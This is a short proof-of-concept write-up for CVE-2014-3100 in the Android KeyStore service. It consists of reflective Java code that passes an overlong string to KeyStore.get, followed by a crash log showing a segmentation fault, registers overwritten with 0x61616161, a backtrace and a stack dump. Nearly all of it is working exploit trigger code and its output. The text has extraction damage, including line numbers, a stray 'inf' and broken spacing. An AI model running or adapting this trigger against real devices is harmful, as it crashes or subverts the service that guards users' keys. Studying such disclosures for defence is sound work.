CVE-2014-3100

1. CVE-2014-3100 POC javascript trigger code:
2.  
3. 1 Class keystore = Class . forName (" android . security . KeyStore ");
4. 2 Method mGetInstance = keystore . getMethod (" getInstance ");
5. 3 Method mGet = keystore . getMethod (" get", String . class );
6. 4 Object instance = mGetInstance . invoke ( null ); inf
7. 5 mGet . invoke ( instance ,
8. 6 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
9. 7 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
10. 8 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
11. 9 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
12. 10 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
13. 11 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa "+
14. 12 " aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ");
15.  
16.  
17. Running this code crashes the KeyStore process:
18. F/ libc ( 2091): Fatal signal 11 ( SIGSEGV ) at 0 x61616155 ( code =1) , thread 2091 ( keystore )
19. I/ DEBUG ( 949): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
20. I/ DEBUG ( 949): Build fingerprint : 'generic_x86 / sdk_x86 / generic_x86 :4.3/ JSS15
21. J/eng. android - build .20130801.155736: eng/test -keys '
22. I/ DEBUG ( 949): Revision : '0'
23. I/ DEBUG ( 949): pid: 2091 , tid: 2091 , name : keystore >>> / system /bin/ keystore <<<
24. I/ DEBUG ( 949): signal 11 ( SIGSEGV ), code 1 ( SEGV_MAPERR ), fault addr 61616155
25. I/ DEBUG ( 949): eax 61616161 ebx b7779e94 ecx bff85ed0 edx b777a030
26. I/ DEBUG ( 949): esi b82a78a0 edi 000003 e8
27. I/ DEBUG ( 949): xcs 00000073 xds 0000007 b xes 0000007 b xfs 00000000 xss 0000007 b
28. I/ DEBUG ( 949): eip b7774937 ebp 61616161 esp bff85d20 flags 00010202
29. I/ DEBUG ( 949):
30. I/ DEBUG ( 949): backtrace :
31. I/ DEBUG ( 949): #00 pc 0000 c937 / system /bin/ keystore ( KeyStore :: getKeyForName ( Blob *,
32. android :: String8 const &,
33. unsigned int , BlobType )+695)
34. I/ DEBUG ( 949):
35. I/ DEBUG ( 949): stack :
36. I/ DEBUG ( 949): bff85ce0 00000000
37. ...
38. I/ DEBUG ( 949): bff85d48 00000007
39. I/ DEBUG ( 949): bff85d4c bff85ed0 [ stack ]
40. I/ DEBUG ( 949): bff85d50 bff8e1bc [ stack ]
41. I/ DEBUG ( 949): bff85d54 b77765a3 / system /bin/ keystore
42. I/ DEBUG ( 949): bff85d58 b7776419 / system /bin/ keystore
43. I/ DEBUG ( 949): bff85d5c bff85ed4 [ stack ]
44. I/ DEBUG ( 949): ........ ........
45. I/ DEBUG ( 949):
46. I/ DEBUG ( 949): memory map around fault addr 61616155:
47. I/ DEBUG ( 949): (no map below )
48. I/ DEBUG ( 949): (no map for address )
49. I/ DEBUG ( 949): b72ba000 - b73b8000 r-- /dev/ binder